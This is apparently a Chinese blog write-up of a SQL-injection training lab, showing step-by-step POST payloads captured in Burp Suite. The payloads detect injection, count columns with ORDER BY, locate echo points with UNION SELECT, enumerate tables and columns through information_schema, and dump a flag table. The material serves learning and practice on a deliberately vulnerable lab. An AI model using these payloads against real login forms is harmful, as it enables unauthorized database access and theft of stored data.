sql_lab之sqli中的post注入

Post注入

用burpsuit抓包去做

Post第一关:(gxa5)

1.判断是否存在注入

username=1'or 1=1 #&password=123&submit=%E7%99%BB%E5%BD%95 有回显

username=1'or 1=2 #&password=123&submit=%E7%99%BB%E5%BD%95 没有回显

则证明存在sql注入

2.判断字段数

username=1'or 1=1 order by 4 #&password=123&submit=%E7%99%BB%E5%BD%95 没有回显

username=1'or 1=1 order by 3 #&password=123&submit=%E7%99%BB%E5%BD%95 有回显

则证明字段数是3

3.用union查询判断回显点

username=1'union select 1,2,3 -- a&password=123&submit=%E7%99%BB%E5%BD%95

4.查出当前数据库名

username=1'union select 1,database(),3 -- a&password=123&submit=%E7%99%BB%E5%BD%95

5.查询当前数据库中的表名

username=1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' -- a&password=123&submit=%E7%99%BB%E5%BD%95

6.查询flag表中的字段名

username=1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='flag' -- a&password=123&submit=%E7%99%BB%E5%BD%95

7.查字段里面的数据

username=1'union select 1,group_concat(id),group_concat(flag) from flag -- a&password=123&submit=%E7%99%BB%E5%BD%95

相关推荐

  1. sql_labsqlipost注入

    2023-12-21 09:14:04       27 阅读
  2. sqllabs1-7sql注入

    2023-12-21 09:14:04       15 阅读

最近更新

  1. TCP协议是安全的吗?

    2023-12-21 09:14:04       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-21 09:14:04       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-21 09:14:04       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-21 09:14:04       18 阅读

热门阅读

  1. boost::apply_visitor

    2023-12-21 09:14:04       29 阅读
  2. 桥接设计模式

    2023-12-21 09:14:04       23 阅读
  3. 【打卡】牛客网:BM68 矩阵的最小路径和

    2023-12-21 09:14:04       36 阅读
  4. 局部加权学习算法的Python实现

    2023-12-21 09:14:04       31 阅读